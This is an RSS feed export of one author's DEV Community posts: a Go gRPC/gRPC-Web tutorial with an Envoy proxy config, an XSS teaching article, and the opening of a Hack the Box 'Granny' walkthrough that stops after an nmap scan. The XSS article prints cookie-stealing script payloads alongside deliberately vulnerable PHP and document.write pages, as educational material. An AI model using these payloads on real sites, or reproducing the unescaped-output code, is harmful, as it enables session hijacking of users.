<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: ikkyu</title>
    <description>The latest articles on DEV Community by ikkyu (@ikk_hck).</description>
    <link>https://dev.to/ikk_hck</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F559783%2Ff71b8a58-9b52-4f94-a0a3-5bba970ab317.jpeg</url>
      <title>DEV Community: ikkyu</title>
      <link>https://dev.to/ikk_hck</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/ikk_hck"/>
    <language>en</language>
    <item>
      <title>Using gRPC and gRPC-Web with a Golang</title>
      <dc:creator>ikkyu</dc:creator>
      <pubDate>Mon, 13 Dec 2021 04:08:12 +0000</pubDate>
      <link>https://dev.to/ikk_hck/using-grpc-and-grpc-web-with-a-golang-182f</link>
      <guid>https://dev.to/ikk_hck/using-grpc-and-grpc-web-with-a-golang-182f</guid>
      <description>&lt;h1&gt;
  
  
  Set Up
&lt;/h1&gt;

&lt;p&gt;The final directory structure will look like this.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt; go
  |_prj
     |_gRPC_prjweb_tmp
          |-api.proto
          |-client
          |  |_client.go
          |-docker-compose.yaml
          |-go.mod
          |-go.sum
          |-html
          |  |-dist
          |  |  |_main.js
          |  |-index.html
          |  |_index.js
          |-Makefile
          |-pb
          |  |-api_grpc_web_pb.js
          |  |-api.pb.go
          |  |-api_pb.js
          |  |-node_modules
          |  |-package.json
          |  |_package-lock.json
          |-proxy
          |  |-conf
          |  |  |_envoy.yaml
          |  |_Dockerfile
          |_server
             |_server.go


&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And network structure will look like this.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;gRPC_web(4444)&amp;lt;--&amp;gt;envoy(8080)&amp;lt;--&amp;gt;gRPC_server(8000)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;First, build the environment.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;go mod init web_tmp
go get google.golang.org/protobuf github.com/sirupsen/logrus golang.org/x/net/context google.golang.org/grpc google.golang.org/grpc/codes google.golang.org/grpc/status
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h1&gt;
  
  
  gRPC
&lt;/h1&gt;

&lt;p&gt;Create a proto file.&lt;br&gt;
&lt;em&gt;[api.proto]&lt;/em&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;syntax = "proto3";

service Greeter {
  rpc Hello (HelloRequest) returns (HelloReply) {}
}

message HelloRequest {
  string name = 1;
}

message HelloReply {
  string message = 1;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Create a pb directory and generate the Protocol Buffers code from the api.proto file.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mkdir pb
protoc --go_out=plugins=grpc:pb api.proto
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Create a server directory and a client directory.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mkdir server
mkdir client
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then we'll write the server and client code.&lt;br&gt;
&lt;em&gt;[server/server.go]&lt;/em&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;package main

import (
    "fmt"
    pb "web_tmp/pb"
    "net"
    "github.com/sirupsen/logrus"
    "golang.org/x/net/context"
    "google.golang.org/grpc"
)

func main() {
    listener, err := net.Listen("tcp", ":8000")
    if err != nil {
            panic(err)
    }
    server := grpc.NewServer()
    greeterService := &amp;amp;GreeterService{}
    pb.RegisterGreeterServer(server, greeterService)
    logrus.Info(fmt.Sprintf("start server: %#v", listener.Addr().String()))
    server.Serve(listener)
}

type GreeterService struct {}

func (s *GreeterService) Hello(ctx context.Context, in *pb.HelloRequest) (*pb.HelloReply, error) {
        return &amp;amp;pb.HelloReply{Message: "Hello " + in.GetName()}, nil
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;em&gt;[client/client.go]&lt;/em&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;package main

import (
    "context"
    pb "web_tmp/pb"
    "github.com/sirupsen/logrus"
    "google.golang.org/grpc"
)

func main() {
    conn, err := grpc.Dial("localhost:8000", grpc.WithInsecure())
    if err != nil {
            panic(err)
    }
    defer conn.Close()

    c := pb.NewGreeterClient(conn)
    name := &amp;amp;pb.HelloRequest{Name: "lupin"} 

    r, err := c.Hello(context.TODO(), name)
    if err != nil {
        logrus.Error(err)
    }
    logrus.Info("Greeting: ", r.GetMessage())
}

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Create a makefile.&lt;br&gt;
&lt;em&gt;[Makefile]&lt;/em&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;.PHONY: server client

server:
        go run ./server/server.go

client: 
        go run ./client/client.go
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Start the server.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;make server
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Run the client code.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;make client
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We can see the gRPC server returning "Hello lupin".&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;INFO[0000] Greeting: Hello lupin
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;h1&gt;
  
  
  gRPC-web
&lt;/h1&gt;

&lt;p&gt;Next, we'll write the code for gRPC-web communication.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;protoc --js_out=import_style=commonjs:pb --grpc-web_out=import_style=commonjs,mode=grpcwebtext:pb api.proto
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The api_grpc_web_pb.js file generated here under the pb directory will be imported by the JS file we create later. Also, install the grpc-web and google-protobuf modules, as they are required for webpack.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;cd pb
npm install grpc-web
npm install google-protobuf
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Create an html directory and create a js file.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mkdir html
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;em&gt;[html/index.js]&lt;/em&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import proto from '../pb/api_grpc_web_pb';
var client = new proto.GreeterClient('http://localhost:8080');
var request = new proto.HelloRequest();
request.setName("lupin");
client.hello(request, {}, function(err, response) {
    if (err) {
        console.log(err.code);
        console.log(err.message);
    } else {
        console.log(response.getMessage());
    }
});

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;h2&gt;
  
  
  Proxy
&lt;/h2&gt;

&lt;p&gt;Create a proxy directory and a conf directory under it to prepare the Envoy proxy. Write the envoy.yaml file under the conf directory you created.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;[proxy/conf/envoy.yaml]&lt;/em&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;admin:
  access_log_path: /tmp/admin_access.log
  address:
    socket_address: { address: 127.0.0.1, port_value: 9901 }

static_resources:
  listeners:
  - name: listener_0
    address:
      socket_address: { address: 127.0.0.1, port_value: 8080 }
    filter_chains:
    - filters:
      - name: envoy.filters.network.http_connection_manager
        typed_config:
          "@type": type.googleapis.com/envoy.config.filter.network.http_connection_manager.v2.HttpConnectionManager
          codec_type: auto
          stat_prefix: ingress_http
          access_log:
            - name: envoy.access_loggers.file
              typed_config:
                "@type": type.googleapis.com/envoy.config.accesslog.v2.FileAccessLog
                path: "/dev/stdout"
          route_config:
            name: local_route
            virtual_hosts:
            - name: local_service
              domains: ["*"]
              routes:
              - match: { prefix: "/" }
                route:
                  cluster: greeter_service
                  max_grpc_timeout: 0s
              cors:
                allow_origin_string_match:
                  - prefix: "*"
                allow_methods: GET, PUT, DELETE, POST, OPTIONS
                allow_headers: keep-alive,user-agent,cache-control,content-type,content-transfer-encoding,custom-header-1,x-accept-content-transfer-encoding,x-accept-response-streaming,x-user-agent,x-grpc-web,grpc-timeout
                max_age: "1728000"
                expose_headers: custom-header-1,grpc-status,grpc-message
          http_filters:
          - name: envoy.filters.http.grpc_web
          - name: envoy.filters.http.cors
          - name: envoy.filters.http.router
  clusters:
  - name: greeter_service
    connect_timeout: 0.25s
    type: logical_dns
    http2_protocol_options: {}
    lb_policy: round_robin
    dns_lookup_family: V4_ONLY
    upstream_connection_options:
      tcp_keepalive:
        keepalive_time: 300
    load_assignment:
      cluster_name: cluster_0
      endpoints:
        - lb_endpoints:
            - endpoint:
                address:
                  socket_address:
                    address: 172.17.0.1
                    port_value: 8000
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Envoy's administration interface listens on port 9901, and the Envoy proxy listens on port 8080. Envoy forwards the traffic it receives to the server on port 8000. The Docker host address used above (172.17.0.1) may vary depending on your environment, so check it.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;ip a | grep docker
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Create the Docker file.&lt;br&gt;
&lt;em&gt;[proxy/Dockerfile]&lt;/em&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;FROM envoyproxy/envoy:v1.15.0
COPY ./conf/envoy.yaml /etc/envoy/envoy.yaml
CMD /usr/local/bin/envoy -c /etc/envoy/envoy.yaml
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Start up the container in the proxy directory.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;docker build -t envoy/hello_lupin .
docker run -d --rm -p 8080:8080 -p 9901:9901 -v ~/go/prj/gRPC_prj/web_tmp/proxy/conf:/etc/envoy --name Greeter envoy/hello_lupin
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Or create docker-compose.yaml in the web_tmp directory.&lt;br&gt;
&lt;em&gt;[docker-compose.yaml]&lt;/em&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;version: '3'
services:
  envoy:
    build:
      context: ./proxy
    image: hello_lupin
    container_name: Greeter
    ports:
      - 8080:8080
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then,&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;docker-compose up
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;By the way, if you want to stop the container&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;docker stop Greeter
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Add the webpack command and the command to build the server to the Makefile and run it.&lt;br&gt;
&lt;em&gt;[Makefile]&lt;/em&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;.PHONY: server client make_webclient

server:
        go run ./server/server.go

client: 
        go run ./client/client.go

web_client:
        cd ./html &amp;amp;&amp;amp; webpack ./index.js &amp;amp;&amp;amp; static -p 4444
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then,&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;make web_client
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Access port 4444 on localhost with a browser and check the Developer Tools console.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flh7k665whk1ek1pwjqov.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flh7k665whk1ek1pwjqov.png" alt="Image description"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>go</category>
      <category>grpc</category>
      <category>grpcweb</category>
      <category>envoy</category>
    </item>
    <item>
      <title>Learning XSS (Cross Site Scripting) with concrete code</title>
      <dc:creator>ikkyu</dc:creator>
      <pubDate>Wed, 19 May 2021 10:45:50 +0000</pubDate>
      <link>https://dev.to/ikk_hck/learning-xss-cross-site-scripting-with-concrete-code-4al2</link>
      <guid>https://dev.to/ikk_hck/learning-xss-cross-site-scripting-with-concrete-code-4al2</guid>
      <description>&lt;p&gt;Hi, I'm ikkyu, and I had a chance to summarize XSS, so I thought I'd write about it. XSS is a bit complicated for beginners, isn't it? There are not many sites that explain XSS with concrete code, so it's hard to visualize.&lt;/p&gt;

&lt;p&gt;twitter:&lt;a href="https://twitter.com/ikk_hck"&gt;@ikk_hck&lt;/a&gt;&lt;/p&gt;

&lt;h1&gt;
  
  
  What is XSS?
&lt;/h1&gt;

&lt;p&gt;According to the &lt;a href="https://www.ipa.go.jp/files/000086442.pdf"&gt;IPA (Information-technology Promotion Agency, Japan)&lt;/a&gt;, cross-site scripting accounts for 58% of all reported website vulnerabilities.&lt;/p&gt;

&lt;p&gt;The fundamental problem is that it is possible to insert scripts into a website from the outside.&lt;br&gt;
 In addition, cross-site scripting basically targets applications that dynamically generate pages in response to user input.&lt;br&gt;
 Recently, the term "cross-site scripting" is used even when the attack is not actually cross-site (in this case, redirected), which tends to confuse newcomers.&lt;/p&gt;
&lt;h1&gt;
  
  
  Same-origin policy
&lt;/h1&gt;

&lt;p&gt;First of all, browsers enforce a restriction called the same-origin policy. For example, if I visit another site and my browser executes a script written there, that script will not be able to retrieve the cookies my browser holds for other sites.&lt;br&gt;
 In short, browsers are built around the concept of a "same-origin policy", so a script loaded from one site cannot access data from another site. XSS is all about circumventing the restrictions of the same-origin policy.&lt;/p&gt;
&lt;h1&gt;
  
  
  Types of XSS
&lt;/h1&gt;

&lt;ul&gt;
&lt;li&gt;Reflected XSS&lt;/li&gt;

&lt;li&gt;Stored XSS&lt;/li&gt;

&lt;li&gt;DOM-based XSS&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--ApuG0vSV--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kxd3jiegxxngzwvin817.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--ApuG0vSV--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kxd3jiegxxngzwvin817.png" alt="Screen Shot 2021-05-19 at 18.58.05"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If you are new to XSS, the following explanation may not be very clear to you, but don't worry: just skim through it and read it again after you finish the article.&lt;br&gt;
First of all, there is the horizontal frame, which contains the reflected and stored types. For these, the attack script goes through the server side. On the other hand, for the DOM-based type the attack script is executed on the front end (*basically).&lt;br&gt;
Next, in the vertical frame, DOM-based is classified as a reflected type, so it is in the same frame as the reflected type. The reflected and DOM-based types are similar in some ways, so the DOM-based type is classified as a subcategory of the reflected type.&lt;/p&gt;
&lt;h1&gt;
  
  
  Reflected type
&lt;/h1&gt;


&lt;ol&gt;

&lt;li&gt;The attacker prepares a link containing a malicious script in a fake email or on a fake website&lt;/li&gt;

&lt;li&gt;The attacker directs the user to a vulnerable website by making the user step on the link (make a request)&lt;/li&gt;

&lt;li&gt;Execute the malicious script in the user's browser&lt;/li&gt;

&lt;li&gt;Exploit information or download malware&lt;/li&gt;


&lt;/ol&gt;

&lt;p&gt;The process goes as listed above. It is called "Reflected XSS" because the script is returned to the requester.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--C7u-VKqW--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0r9oywuelopmow7zs7vf.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--C7u-VKqW--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0r9oywuelopmow7zs7vf.png" alt="image"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;For example, let's assume that the site "&lt;a href="http://localhost/sample.php"&gt;http://localhost/sample.php&lt;/a&gt;" in the link prepared by the attacker in ① in the figure looks like the following.&lt;br&gt;
&lt;/p&gt;

&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;?php
  session_start();
?&amp;gt;

&amp;lt;?php
    header("Content-Type: text/html; charset=UTF-8");
    $input = filter_input(INPUT_GET, "q");
?&amp;gt;

&amp;lt;!doctype html&amp;gt;
&amp;lt;html&amp;gt;
&amp;lt;head&amp;gt;
    &amp;lt;title&amp;gt;xss&amp;lt;/title&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
    &amp;lt;form&amp;gt;
        &amp;lt;input type="text" name="q" value="&amp;lt;?=$input?&amp;gt;"&amp;gt;
        &amp;lt;input type="submit" value="search"&amp;gt;
    &amp;lt;/form&amp;gt;
&amp;lt;?php
    if($input):
?&amp;gt;
    &amp;lt;?=$input?&amp;gt; is found.
&amp;lt;?php
    endif;
?&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;



&lt;p&gt;The output of the page will look like this.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--aOMc8DkG--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tanopfq7x0mtl2v110ph.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--aOMc8DkG--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tanopfq7x0mtl2v110ph.png" alt="image"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;As a side note, when building an environment with XAMPP, if you download XAMPP from Chrome on a Mac, it won't work. In my case it worked fine from Safari.&lt;/p&gt;

&lt;p&gt;Here, you can attach a link like "&lt;a href="http://localhost/sample.php?q="&gt;http://localhost/sample.php?q=&lt;/a&gt;var id = document.cookie; window.location=&amp;lt;code&amp;gt;http://localhost/tmp.php?sessionid=${id}&amp;lt;/code&amp;gt;"&lt;br&gt;
and attach the link to an email or something, then have someone follow it. In the JS used in the query, I first put the cookie into the id variable and then redirect the user to tmp.php, passing that variable along. When the link is clicked, the&lt;br&gt;
&lt;/p&gt;

&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;?php
    if($input):
?&amp;gt;
    &amp;lt;?=$input?&amp;gt; is found.
&amp;lt;?php
    endif;
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;



&lt;p&gt;In sample.php, the &amp;lt;?=$input?&amp;gt; part&lt;br&gt;
&lt;/p&gt;

&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;script&amp;gt;var id = document.cookie; window.location=`http://localhost/tmp.php?sessionid=${id}`&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;



&lt;p&gt;is inserted and fires, redirecting the page to tmp.php with the cookie intact, as planned. tmp.php looks like this, for example:&lt;br&gt;
&lt;/p&gt;

&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;?php
    header("Content-Type: text/html; charset=UTF-8");
    $input = filter_input(INPUT_GET, "sessionid");
?&amp;gt;

&amp;lt;!doctype html&amp;gt;
&amp;lt;html&amp;gt;
&amp;lt;head&amp;gt;
    &amp;lt;title&amp;gt;xss&amp;lt;/title&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
    &amp;lt;?=$input?&amp;gt; 
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;



&lt;p&gt;It stores the content of the received sessionid in $input and displays it.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--qKtl-rwP--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/85nls4snew69aemlqrt4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--qKtl-rwP--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/85nls4snew69aemlqrt4.png" alt="image"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;You can see that the session ID is displayed. &lt;/p&gt;

&lt;h1&gt;
  
  
  Stored type
&lt;/h1&gt;

&lt;p&gt;The characteristics of the stored type are:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The script is written to the database&lt;/li&gt;


&lt;li&gt;Users only need to use the web app as usual to execute the attack&lt;/li&gt;


&lt;li&gt;The attack can be carried out on an unspecified number of users after some time has passed&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;etc.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--t0gvV6hx--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ye4w36cq20dod2o735fs.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--t0gvV6hx--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ye4w36cq20dod2o735fs.png" alt="image"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Let's take a bulletin board site as an example. First, an attacker posts a string containing a malicious script to the bulletin board. The malicious script will then be stored in the database used by the web application.&lt;br&gt;
When this happens, the script runs persistently on the web page, regardless of whether the attack code is included in the HTTP request (as it must be in the reflected type). Since the code is executed every time a user accesses the page, the damage tends to increase. &lt;/p&gt;
&lt;h1&gt;
  
  
  DOM-based type
&lt;/h1&gt;

&lt;p&gt;Features&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A subcategory of the reflected type&lt;/li&gt;

&lt;li&gt;Runs in the client's browser&lt;/li&gt;

&lt;li&gt;No scripts embedded in HTML&lt;/li&gt;

&lt;li&gt;Bypasses the browser's XSS protection mechanism&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Since the script is not embedded in the HTML, the server side does not output the attack script. In other words, while reflected and stored attacks exploit server-side bugs, DOM-based attacks exploit client-side bugs.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;!doctype html&amp;gt;
&amp;lt;html&amp;gt;
&amp;lt;head&amp;gt;
    &amp;lt;title&amp;gt;xss&amp;lt;/title&amp;gt;
&amp;lt;/head&amp;gt;
&amp;lt;body&amp;gt;
&amp;lt;script&amp;gt;
    document.write(decodeURIComponent (location.hash));
&amp;lt;/script&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;  
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Suppose you have a dom_based.html like this. Now, create a link "&lt;a href="http://localhost/dom_based.html#"&gt;http://localhost/dom_based.html#&lt;/a&gt;var id = document.cookie; window.location=&amp;lt;code&amp;gt;http://localhost/tmp.php?sessionid =${id}&amp;lt;/code&amp;gt;" and make someone follow the link, as in the reflected type. The setup is the same as what we saw in the reflected type.&lt;/p&gt;

&lt;p&gt;Then, in the script tag in dom_based.html,&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;script&amp;gt;var id = document.cookie; window.location=`http://localhost/tmp.php?sessionid=${id}`&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;written after the # in the link will fire, redirecting to tmp.php and leaking the cookie. The important difference from the reflected type is that the server does not output the attack script.&lt;br&gt;
In recent years, as the use of JavaScript to manipulate HTML in browsers has increased, the rate of DOM-based XSS has also increased.&lt;/p&gt;

&lt;h1&gt;
  
  
  Security measures
&lt;/h1&gt;

&lt;ul&gt;
&lt;li&gt;Keep your applications up-to-date&lt;/li&gt;
&lt;li&gt;Sanitizing&lt;/li&gt;

&lt;li&gt;Block unauthorized emails&lt;/li&gt;
&lt;li&gt;WAF&lt;/li&gt;

&lt;li&gt;Specifying character encoding in the Content-Type field of HTTP response headers&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;These are just a few examples. In this article, I will not go into the details of each countermeasure, as I only discuss the behavior and mechanism of XSS.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Use "createElement", "createTextNode", etc. instead of "document.write", etc&lt;/li&gt;

&lt;li&gt;If you really want to use "document.write", escape it in that place&lt;/li&gt;

&lt;li&gt;Check the behavior of fragment identifiers&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;It is also important to check the behavior of fragment identifier values. As for the last point, "check the behavior of fragment identifiers", the presence of a reflected XSS vulnerability is determined by whether a script that is input to the web application is output in the response returned from the website.&lt;br&gt;
DOM-based XSS, on the other hand, is completed entirely in the front end, and the script is not output in the response from the website. Therefore, it is not possible to diagnose the presence of this vulnerability using the same method as for reflected XSS.&lt;/p&gt;

</description>
      <category>css</category>
      <category>javascript</category>
      <category>cybersecurity</category>
      <category>php</category>
    </item>
    <item>
      <title>【Hack the Box】Granny - Walkthrough</title>
      <dc:creator>ikkyu</dc:creator>
      <pubDate>Mon, 10 May 2021 12:01:32 +0000</pubDate>
      <link>https://dev.to/ikk_hck/hack-the-box-granny-walkthrough-37f7</link>
      <guid>https://dev.to/ikk_hck/hack-the-box-granny-walkthrough-37f7</guid>
      <description>&lt;p&gt;From the HacktheBox&lt;/p&gt;

&lt;p&gt;twitter:&lt;a href="https://twitter.com/ikk_hck"&gt;@ikk_hck&lt;/a&gt;&lt;/p&gt;

&lt;h1&gt;
  
  
  Enumeration
&lt;/h1&gt;

&lt;p&gt;Anyway, nmap.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ nmap -sC -sV -A -oA granny 10.10.10.15
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-10 03:19 PDT
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Here are the results.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Nmap 7.91 scan initiated Sat May  8 01:11:23 2021 as: nmap -sC -sV -A -oA granny 10.10.10.15
Nmap scan report for 10.10.10.15
Host is up (0.19s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
